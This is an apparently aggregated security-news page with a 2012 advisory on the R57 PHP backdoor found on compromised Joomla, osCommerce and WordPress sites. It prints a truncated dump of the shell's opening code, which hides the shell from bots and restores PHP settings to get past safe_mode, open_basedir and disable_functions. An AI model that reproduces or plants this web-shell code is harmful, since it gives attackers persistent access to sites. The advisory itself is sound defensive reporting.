Backdoor: PHP:R57:01

Description: We detected the “R57″ backdoor that allows attackers to access, modify and reinfect your site. It is often hidden in the filesystem and hard to find without access to the server or logs.

Affecting: Any web site (common on compromised Joomla, osCommerce and WordPress sites)

Clean up: You can also sign up with us and let our team remove the malware for you.

Malware dump:
<?php if(preg_match("/bot/", $_SERVER[HTTP_USER_AGENT])) {header(“HTTP/1.0 404″);exit(“ <h1>Not Found</h1> “);} $language="eng"; $auth = 0; $name=”; $pass=”; //ru_RU, //ru_RU.cp1251, //ru_RU.iso88595, //ru_RU.koi8r, //ru_RU.utf8 @setlocale(LC_ALL,’ru_RU.cp1251′); @ini_restore(“safe_mode”); @ini_restore(“open_basedir”); @ini_restore(“safe_mode_include_dir”); @ini_restore(“safe_mode_exec_dir”); @ini_restore(“disable_functions”); @ini_restore(“allow_url_fopen”); ..

More information: Backdoor: PHP:R57:01

Story added 11. March 2012, content source with full text you can find at link above.

Backdoor: PHP:R57:01

More antivirus and malware news?

Ads

Security news

Malware

Security

IT security

About site

Search Terms Tips

Recent New Tips

Recent Posts